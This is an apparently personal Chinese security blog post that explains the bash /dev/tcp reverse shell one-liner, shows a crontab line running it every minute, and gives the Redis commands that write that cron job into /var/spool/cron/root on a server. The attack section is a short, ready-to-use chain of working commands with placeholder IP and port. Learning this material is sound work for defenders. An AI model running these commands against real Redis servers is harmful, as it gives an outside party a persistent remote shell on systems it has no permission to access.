<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="Redis反弹Shell"><meta name="keywords" content="Web安全,Linux,Redis"><meta name="author" content="Oah"><meta name="copyright" content="Oah"><title>Redis反弹Shell | Oah's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.7.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.7.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  }
} </script><meta name="generator" content="Hexo 4.2.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#背景知识"><span class="toc-number">1.</span> <span class="toc-text">背景知识</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Linux反弹Shell"><span class="toc-number">1.1.</span> <span class="toc-text">Linux反弹Shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#crontab写Shell"><span class="toc-number">1.2.</span> <span class="toc-text">crontab写Shell</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Redis反弹Shell"><span class="toc-number">2.</span> <span class="toc-text">Redis反弹Shell</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#参考文章"><span class="toc-number">3.</span> <span class="toc-text">参考文章</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.gif"></div><div class="author-info__name text-center">Oah</div><div class="author-info__description text-center"></div><div class="follow-button"><a href="https://github.com/XshIsMe" target="_blank" rel="noopener">GitHub</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">46</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">15</span></a></div></div></div><div id="content-outer"><div class="plain" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Oah's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">文章</a><a class="site-page" href="/tags">标签</a></span><span class="pull-right"></span></div></div><div class="layout" id="content-inner"><article id="post"><div class="plain" id="post-title">Redis反弹Shell</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-07-22</time></div><div class="article-container" id="post-content"><h1 id="背景知识"><a href="#背景知识" class="headerlink" title="背景知识"></a>背景知识</h1><h2 id="Linux反弹Shell"><a href="#Linux反弹Shell" class="headerlink" title="Linux反弹Shell"></a>Linux反弹Shell</h2><p>用于Linux反弹Shell的命令如下</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; /dev/tcp/[ip]/[port] 0&gt;&amp;1 2&gt;&amp;1</span><br></pre></td></tr></table></figure>

<p>将它分解成以下几个部分，分别理解</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i</span><br></pre></td></tr></table></figure>

<p>打开一个交互式的bash</p>
<p>可以使用命令 <code>echo $-</code> 来判断是否是交互式的Shell，输出结果的解释如下</p>
<ul>
<li>h：Cache location of binaries in the $PATH. Speeds up execution, but fails if you move binaries around during the shell session</li>
<li>i：The current shell is interactive</li>
<li>m：Job control is enabled</li>
<li>B：Brace expansion is enabled</li>
<li>H：History substitution like !-1</li>
</ul>
<p>测试是否是交互式Shell</p>
<p><img src="f32373c66a3c506e2710fce67be5859e.png" alt="img"></p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/dev/tcp/[ip]/[port]</span><br></pre></td></tr></table></figure>

<p>通过ip和端口与另一台主机建立一个socket连接，另一台主机可以通过 <code>nc -lvp [port]</code> 命令与这台主机通信</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&gt;&amp; 0&gt;&amp;1 2&gt;&amp;1</span><br></pre></td></tr></table></figure>

<p>这些命令涉及到了Linux的输入/输出重定向和保留文件描述符</p>
<p>输入/输出重定向</p>
<table>
<thead>
<tr>
<th>命令</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>command &gt; file</td>
<td>将输出重定向到 file</td>
</tr>
<tr>
<td>command &lt; file</td>
<td>将输入重定向到 file</td>
</tr>
<tr>
<td>command &gt;&gt; file</td>
<td>将输出以追加的方式重定向到 file</td>
</tr>
<tr>
<td>n &gt; file</td>
<td>将文件描述符为 n 的文件重定向到 file</td>
</tr>
<tr>
<td>n &gt;&gt; file</td>
<td>将文件描述符为 n 的文件以追加的方式重定向到 file</td>
</tr>
<tr>
<td>n &gt;&amp; m</td>
<td>将输出文件 m 和 n 合并</td>
</tr>
<tr>
<td>n &lt;&amp; m</td>
<td>将输入文件 m 和 n 合并</td>
</tr>
<tr>
<td>&lt;&lt; tag</td>
<td>将开始标记 tag 和结束标记 tag 之间的内容作为输入</td>
</tr>
</tbody></table>
<p>保留文件描述符</p>
<table>
<thead>
<tr>
<th>保留文件描述符</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td>0</td>
<td>标准输入（STDIN）</td>
</tr>
<tr>
<td>1</td>
<td>标准输出（STDOUT）</td>
</tr>
<tr>
<td>2</td>
<td>标准错误输出（STDERR）</td>
</tr>
</tbody></table>
<p>现在开始将这些命令组合起来理解</p>
<p>首先是 <code>bash -i &gt;&amp; /dev/tcp/[ip]/[port]</code>，它的意思是将这个交互式bash的所有输出都发送到目标主机</p>
<p><code>2&gt;&amp;1</code> 的意思是将系统的标准输出和标准错误输出合并，也就是所有输出都统一到一个地方</p>
<p><code>0&gt;&amp;1</code> 的意思是将目标主机的输入发送到bash</p>
<p>最终就实现了远程反弹Shell</p>
<h2 id="crontab写Shell"><a href="#crontab写Shell" class="headerlink" title="crontab写Shell"></a>crontab写Shell</h2><p>crontab的作用是设置定时任务，可以通过编辑 <code>/var/spool/cron/root</code> 文件来添加定时任务</p>
<p>定时任务的写法如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"># Example of job definition:</span><br><span class="line"># .---------------- minute (0 - 59)</span><br><span class="line"># |  .------------- hour (0 - 23)</span><br><span class="line"># |  |  .---------- day of month (1 - 31)</span><br><span class="line"># |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...</span><br><span class="line"># |  |  |  |  .---- day of week (0 - 6) (Sunday&#x3D;0 or 7) OR sun,mon,tue,wed,thu,fri,sat</span><br><span class="line"># |  |  |  |  |</span><br><span class="line"># *  *  *  *  * user-name command to be executed</span><br></pre></td></tr></table></figure>

<p>写进定时任务的内容如下，意思是每分钟运行一次反弹Shell的命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">*&#x2F;1 * * * * bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;[ip]&#x2F;[port] 0&gt;&amp;1 2&gt;&amp;1</span><br></pre></td></tr></table></figure>

<h1 id="Redis反弹Shell"><a href="#Redis反弹Shell" class="headerlink" title="Redis反弹Shell"></a>Redis反弹Shell</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">set shell &quot;*&#x2F;1 * * * * bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;[ip]&#x2F;[port] 0&gt;&amp;1 2&gt;&amp;1&quot;</span><br><span class="line">config set dir &#x2F;var&#x2F;spool&#x2F;cron&#x2F;</span><br><span class="line">config set dbfilename root</span><br><span class="line">save</span><br></pre></td></tr></table></figure>

<h1 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h1><p><a href="https://blog.csdn.net/Auuuuuuuu/article/details/89059176" target="_blank" rel="noopener">Linux之bash反弹shell原理浅析_Au-CSDN博客_bash -i</a></p>
<p><a href="https://www.cnblogs.com/iouwenbo/p/11277453.html" target="_blank" rel="noopener">反弹shell原理与实现 - iouwenbo - 博客园</a></p>
<p><a href="https://www.runoob.com/linux/linux-shell-io-redirections.html" target="_blank" rel="noopener">Shell 输入/输出重定向 | 菜鸟教程</a></p>
<p><a href="https://segmentfault.com/a/1190000010975294" target="_blank" rel="noopener">linux反弹shell命令解析 - 个人文章 - SegmentFault 思否</a></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Oah</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://xshisme.github.io/2020/07/22/Redis%E5%8F%8D%E5%BC%B9Shell/">https://xshisme.github.io/2020/07/22/Redis%E5%8F%8D%E5%BC%B9Shell/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://xshisme.github.io">Oah's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Web%E5%AE%89%E5%85%A8/">Web安全</a><a class="post-meta__tags" href="/tags/Linux/">Linux</a><a class="post-meta__tags" href="/tags/Redis/">Redis</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/07/23/XSS%E5%B9%B3%E5%8F%B0%E7%A0%94%E7%A9%B6/"><i class="fa fa-chevron-left">  </i><span>XSS平台研究</span></a></div><div class="next-post pull-right"><a href="/2020/07/21/Vulhub%E5%AD%A6%E4%B9%A0%EF%BC%88%E5%9B%9B%EF%BC%89/"><span>Vulhub学习（四）</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2020 By Oah</div><div class="framework-info"><span>驱动 - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.7.0"></script><script src="/js/fancybox.js?version=1.7.0"></script><script src="/js/sidebar.js?version=1.7.0"></script><script src="/js/copy.js?version=1.7.0"></script><script src="/js/fireworks.js?version=1.7.0"></script><script src="/js/transition.js?version=1.7.0"></script><script src="/js/scroll.js?version=1.7.0"></script><script src="/js/head.js?version=1.7.0"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>